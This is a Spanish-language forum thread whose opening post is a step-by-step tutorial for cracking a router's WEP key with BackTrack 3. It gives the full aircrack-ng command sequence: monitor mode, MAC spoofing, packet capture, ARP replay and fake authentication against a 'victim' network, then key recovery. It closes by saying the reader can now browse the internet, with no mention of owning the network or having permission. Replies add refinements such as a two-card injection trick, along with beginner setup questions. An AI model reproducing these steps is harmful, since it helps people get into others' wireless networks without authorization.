Sacar clave WEP con Backtrack 3+Atheros AR5001

[charlie_spiel]

En este pequeño tuto les mostrare como crackear la clave WEP de los Routers!!

En este tuto yo utilizo:
Atheros AR5001 + Wireless Network Adapter (tarjeta de red)

Para ver este enlace Registrate o Inicia Sesion

Back Track 3

Weno, primero abrimos una shell, y escribimos:

airmon-ng stop ath0


(esto es como para detener la tarjeta de red ath0)

Despues escribimos:

macchanger -m 11:22:33:44:55:66 wifi0


)esto es para cambiar nuesta direccion mac)

Despues ponemos

airmon-ng start wifi0


(esto es para activar nuestra tarjeta en modo monitor)

Para saber que todo ha ido bien ponemos

iwconfig


(en esta pantallita podemos ver que esta en modo monitor y ver que cambiamos la direccion mac)

Despues buscamos las redes que hay al alcance

airodump-ng ath0


Aqui debemos apuntar en una hojita lo siguiente:
BSSID (xx:xx:xx:xx:xx:xx)
CH (en este caso es 5)
ESSID (Nombre de la RED)

ya que tengamos estos datos, apretamos (control+C) y vremos que se detendra la pantalla anterior..

Despues ponemos..

airodump-ng --channel x --write xxx ath0
x= canal, como en el paso anterio el 5 pues quedaria asi (--channel 5)
xxx= nombre, aqui pueden ponel elnombre que quieran, pero acuerdense de lo que ponen, y en mi caso quedaria asi (--write pass)

airodump-ng --channel 5 --write pass ath0      (hasta aqui vamos bien?)


(aqui tendremos una pantallita similar a la anterior)

Ahora abrimos otra shell...
y en ella ponemos:

aireplay-ng -3 -b (mac de la victima) -h (nuestra mac) ath0

y pues quedaria mas o menos asi;

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66


(esto es para empezar a capturar datos ARP)

Ahora abrimos otra shell y escribimos:

aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0

a mi me quedaria asi:

aireplay-ng -1 0 ESSID -a xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0


y veremos que los ARP empiezan a subir de volada....

hasta este paso debemos de tener dos shell's abrietas



Ahora podemos ver que despues de 10 minutos ya tenemos 62160 ARP, con eso es mas que suficiente, ahora a las dos shell's las cancelamos, en cada una apretamos (control+C)



Ya estamos en lo ultimo, ahora abrimos otra shell y escribimos:

aircrack-ng xx-01.cap
xx= el nombre que les dije que se acordaran, en mi caso es (pass)

aircrack-ng pass-01.cap



Como la red que nosotros elegimos es la opcion 1 pues ponemos el 1 y damos enter..



Y liesto ya tenemos la Key Found xx:xx:xx:xx:xx

esa la debemos poner pero son los dos puntos (xxxxxxxxxx)

y listo!!! ya podemos navegar en internet...

Espero que les haya servido.

[RaKi0N]

Este tutorial tendrias que haberlo puesto en redes

hay mucha información acerca de esto ya..

[alexelprogramador]

hola

el tutorial es bueno, salvando el handicap que has quitado las mac, y por tanto, los usuarios se pierden bastante a la hora de saber de quien es cada mac.

ademas de esto, no es estrictamente necesario usar

Código:

macchanger -m 11:22:33:44:55:66 wifi0

porque cuando hagas el ataque por falsa autentificacio n, aireplay-ng ya te hace un cambio de mac, automáticamente, con lo cual, esta orden sobra.

por lo demas, muy bien.

[charlie_spiel]

hola

el tutorial es bueno, salvando el handicap que has quitado las mac, y por tanto, los usuarios se pierden bastante a la hora de saber de quien es cada mac.

ademas de esto, no es estrictamente necesario usar

Código:

macchanger -m 11:22:33:44:55:66 wifi0

porque cuando hagas el ataque por falsa autentificacio n, aireplay-ng ya te hace un cambio de mac, automáticamente, con lo cual, esta orden sobra.

por lo demas, muy bien.

En eso tienes razon, pero yo lo hice para que sea una mac facil de aprender, por que de lo contrario les costaria mas trabajo aprenderse o escribir dos macs, ademas ustedes les pueden poner los numeros que quieran jeje

[alexelprogramador]

En eso tienes razon, pero yo lo hice para que sea una mac facil de aprender, por que de lo contrario les costaria mas trabajo aprenderse o escribir dos macs, ademas ustedes les pueden poner los numeros que quieran jeje

yo suelo usar esa, la 11:22:33:44:55:66 pero, aver, no es imprescindible .

de hecho, para inyectar inyectar, hay otro sistema todavia mucho mas poderoso.

yo lo llamo el ataque doble con inyeccion 

y necesitas como minimo dos tarjetas de red 

con una te autentificas, aunque no conozcas la clave, te la inventas.

y con la otra inyectas.

es un truco del almendruco que me enseñaron en seguridadwirel ess

ademas, tiene su logica.

si quieres preguntar algo, aqui estoy  :

[mensajeoculto]

asi es tiene mucha razon alexelprograma dor no dijiste sobre macchanger -m 11:22:33:44:55 ya que en veces no se necesito hacerlo, que hay veces que no me la pide para capturar solo la pongo asi, pero cuando no me funciona la tengo que cambiar a macchanger y eso no especificaste en el tutorial, pero muy bueno el tutorial.

saludos

[gatonegro91]

ola, tengo un problema nada mas q pongo airmon-ng stop ath0 xq lo pongo y no me encuentra ninguna red, pero cuando las busco normalmente sin el cd, me encuentra 5 o 6
q puede pasar??
un saludo y gracias

[_ANTRAX_]

En el link que nos das, nos debemos descargar un archivo.rar?
Es muy grande el archivo no?

[M/Q]

En el link que nos das, nos debemos descargar un archivo.rar?
Es muy grande el archivo no?

Buenas.. si te refieres a este enlace
Para ver este enlace Registrate o Inicia Sesion es para descargar el Backtrack, y si que es grande, es un sistama operativo..

[_ANTRAX_]

Aun no entiendo muy bien esto, cuando me descargue eso, sera como una aplicacion para ejecutar y me saldra la pantalla  como las que estan en el tuto?
Funciona esto con windows xp?
 Es un sistema operativo?
Es como linux, windos etc 
Sirve de algo si me lo bajo ahora?

[M/Q]

Aun no entiendo muy bien esto, cuando me descargue eso, sera como una aplicacion para ejecutar y me saldra la pantalla  como las que estan en el tuto?
Funciona esto con windows xp?
 Es un sistema operativo?
Es como linux, windos etc 
Sirve de algo si me lo bajo ahora?

Si mira te explico un poco...

El enlace que esta ahi es para descargar el Backtrack

el backtrack no es un programa que puedes usar dentro de un Linux o en windows, es un sistema operativo que puedes arrancarlo desde el cd.

es una distribucion pensada para ser usada como live-cd o live-usb, y orientada únicamente al mundo de la seguridad y auditoria.

esta distribución surgió de la unión de dos prestigiosas distribuciones del mundo de la seguridad: Auditor y WHAX.

contienen más de 300 aplicaciones preinstaladas y configuradas para su uso inmediato, como scripts, exploits, y test de penetración que backtrack lleva incluido, entre ellas varias de análisis forenses y las más usuales herramientas para crackear claves WEP e inyectar paquetes...  como lo vez en el tuto.

esta distribución te gustará si estas interesado por alguna razón en temas de seguridad, si quieres hacer algún test de penetración o si quieres empezar a profundizar en el tema...

yo lo he probado con temas WiFi y mas cosas, te recomiendo que te lo descargues el LiveCD y probarlo para echarle un vistazo... pero para mi la mejor para temas wifis es el Wifislax. 

Al descargarlo lo tienes que grabar como iso bootable con un programa como nero, el archivo iso es el sistema operativo y el boot para que se ejecute el
sistema cuando insertas el cd....

Aqui unas imagenes de como es cuando ya tengas corriendolo en tu PC. 

[tesacu]

¿ALguien sabe por qué antes metía el live cd del Troppix arrancaba con él y ponía iwconfig  me salía mi tarjeta de red y ahora ninguna de las q aparecen son la mía? Es que así no puedo ver las redes y no puedo hace rlo que hay que hacer para averiguar las contraseñas.